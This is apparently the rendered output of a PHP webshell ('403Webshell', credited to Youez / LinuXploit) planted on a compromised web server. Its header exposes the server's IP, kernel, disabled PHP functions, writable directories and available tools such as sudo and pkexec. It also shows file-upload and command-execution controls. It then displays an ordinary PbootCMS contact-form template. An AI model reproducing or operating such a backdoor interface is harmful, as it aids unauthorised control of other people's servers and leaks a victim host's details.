403Webshell
Server IP : 156.238.232.47  /  Your IP : 216.73.216.150
Web Server : nginx/1.25.3
System : Linux C202504152095410 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : www ( 1000)
PHP Version : 8.3.25
Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /www/data/wwwroot/2025_11_04_02/template/en/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /www/data/wwwroot/2025_11_04_02/template/en/message.html
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="content-language" content="zh-CN" />
<meta name="viewport" content="width=device-width,initial-scale=1.0,user-scalable=no" />
<meta name="apple-mobile-web-app-capable" content="yes" />
<meta name="apple-mobile-web-app-status-bar-style" content="black" />
<meta name="format-detection" content="telephone=no" />
<title>{pboot:if('{sort:title}'=='')}{pboot:pagetitle}{else}{sort:title}{/pboot:if}</title>
<meta name="keywords" content="{pboot:if('{sort:keywords}'=='')}{pboot:pagekeywords}{else}{sort:keywords}{/pboot:if}">
<meta name="description" content="{pboot:if('{sort:description}'=='')}{pboot:pagedescription}{else}{sort:description}{/pboot:if}">
<meta name="renderer" content="webkit">
<meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">
<link rel="stylesheet" href="{pboot:sitedomain}/skin/css/reset.css" type="text/css" media="screen" charset="utf-8">
<link rel="stylesheet" href="{pboot:sitedomain}/skin/css/swiper.min.css" type="text/css" media="screen" charset="utf-8">
<link rel="stylesheet" href="{pboot:sitedomain}/skin/css/animate.css" type="text/css" media="screen" charset="utf-8">
<link rel="stylesheet" href="{pboot:sitedomain}/skin/css/style.css" type="text/css" media="screen" charset="utf-8">
<script src="{pboot:sitedomain}/skin/js/jquery-1.11.3.js" type="text/javascript" charset="utf-8"></script>
<script src="{pboot:sitedomain}/skin/js/wow.min.js" type="text/javascript" charset="utf-8"></script>
<script src="{pboot:sitedomain}/skin/js/adaptive-version2.js" type="text/javascript" charset="utf-8"></script>
<script>
	window['adaptive'].desinWidth = 750;
	window['adaptive'].init();
</script>
<script>
	$(function(){
		$('#tj').click(function(){
			//alert(1)
			if($('#name').val()==''){alert('Please enter your name!'); $("#name").focus(); return false;}
			if ($("#tel").val() == "") { alert("Please enter your mobile phone!"); $("#tel").focus(); return false; } 
			if (!$("#tel").val().match(/^(((13[0-9]{1})|(14[0-9]{1})|(15[0-9]{1})|(16[0-9]{1})|(17[0-9]{1})|(18[0-9]{1})|(19[0-9]{1}))+\d{8})$/)) { alert("The mobile phone number format is incorrect!"); $("#tel").focus(); return false;} 
		})
	})
</script>
</head>
<body style="background: #f0f0f0;">
{include file=head2.html}
<div class="w1200 contact">
  <div class="contact-b wow fadeInUp">{sort:name}</div>
  <div class="contact-img wow fadeInUp">
    <div class="message-page">
      <form action="{pboot:msgaction}"  method="post">
        <div>
          <div class="row-1 ico-name">
            <input type="text" class="txt" name="name"  value="" placeholder="Name" id="name">
            <i class="tip">*</i> </div>
          <div class="row-1 ico-phone">
            <input type="text" class="txt" name="tel"  value="" placeholder="Tel" id="tel">
            <i class="tip">*</i> </div>
          <div class="row-1 ico-email">
            <input type="text" class="txt" name="email"  value="" placeholder="Email">
          </div>
          <div class="row-2">
            <textarea class="text" name="content" placeholder="Content..."></textarea>
          </div>
          <div class="row-3">
            <input type="text" class="code" name="checkcode"  value="" placeholder="Code">
            <img title="" src="{pboot:checkcode}" onclick="this.src='{pboot:checkcode}?'+Math.round(Math.random()*10);" height="40" /> </div>
          <div class="row-3">
            <input type="submit" class="submit" value="Submit" id="tj">
            <input type="reset" class="reset" value="Reset">
          </div>
          <div class="clear"></div>
        </div>
      </form>
    </div>
  </div>
</div>
<div class="clear"></div>
{include file=foot.html}
<script src="{pboot:sitedomain}/skin/js/tools.js" type="text/javascript" charset="utf-8"></script> 
<script>
$(function(){
	// 使用main.js里的方法
	$("header").addClass("cli");
	head();
	sfgd(".sf-ban-cli",".product");
	
		//js部分
	$(document).ready(function(){
	a=window.location;
	$(".nav-ul li a").each(function(){
	b=String($(this).attr("href")).replace("/","")//首页如果用的是域名可不用replace
	if(String(a).indexOf(b)>0){//获得当前li下a的href值,并进行替换
	 $(this).closest("li").addClass("on");
	}
	});
	});	
	
	// 点击产品中心效果
	$(".product-a1").click(function(){
		if($(".product-a2").is(":hidden")){
			$(".product-a2").slideDown();
			$(".product-a1").removeClass("on");
		}else{
			$(".product-a2").slideUp();
			$(".product-a1").addClass("on");
		}
	})
})
</script>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit